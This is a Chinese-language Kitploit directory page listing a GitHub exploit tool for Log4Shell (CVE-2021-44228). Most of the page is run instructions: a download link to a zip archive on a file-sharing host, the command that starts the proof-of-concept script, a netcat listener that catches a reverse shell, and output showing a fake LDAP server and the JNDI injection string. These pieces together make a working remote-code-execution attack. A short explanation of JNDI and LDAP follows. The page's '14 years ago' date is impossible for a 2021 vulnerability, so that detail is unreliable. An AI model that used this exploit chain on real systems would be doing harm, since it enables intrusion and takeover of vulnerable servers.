Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Log4j-Exploit-CVE-2021-44228 — CVE-2021-44228 (Log4Shell) 的漏洞利用工具,设置恶意LDAP服务器并传递Java载荷,以在易受攻击的Log4j应用程序上实现远程代码执行。 | Kitploit
工具/GitHubGitHub/willian-2-0-0-1/log4j-exploit-cve-2021-44228
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制
GitHubwillian-2-0-0-1/log4j-exploit-cve-2021-44228

Log4j-Exploit-CVE-2021-44228

CVE-2021-44228 (Log4Shell) 的漏洞利用工具,设置恶意LDAP服务器并传递Java载荷,以在易受攻击的Log4j应用程序上实现远程代码执行。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
14年前尚未审核

Log4j漏洞利用-CVE-2021-44228

Log4Shell漏洞测试工具 https://log4shell.tools/

漏洞利用已包含Java,无需创建账号等..

root@kitploit:~
http://www.mediafire.com/file/bs1spnysc6fbz1a/log4j-shell-poc_%25281%2529.zip/file
root@kitploit:~
pip install -r requirements.txt
root@kitploit:~
$ python3 poc.py --userip localhost --webport 8000 --lport 9001
root@kitploit:~
nc -lvnp 9001
root@kitploit:~
$ python3 poc.py --userip localhost --webport 8000 --lport 9001

[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc

[+] Exploit java class created success
[+] Setting up fake LDAP server

[+] Send me: ${jndi:ldap://localhost:1389/a}

Listening on 0.0.0.0:1389

log4j的基本概念

什么是JNDI

JNDI是一种Java API,用于目录服务,允许Java软件客户端通过名称发现和搜索数据及资源。

什么是LDAP

LDAP是一种目录访问协议,可用于验证用户名和密码与Docker、Jenkins、Kubernetes、Open VPN和Linux Samba服务器。LDAP单点登录也可被系统管理员用于控制对LDAP数据库的访问。

想要了解更多关于该漏洞的信息,请参阅以下文档:

https://www.lunasec.io/docs/blog/log4j-zero-day/

不包含Java的漏洞利用

https://github.com/kozmer/log4j-shell-poc
下载工具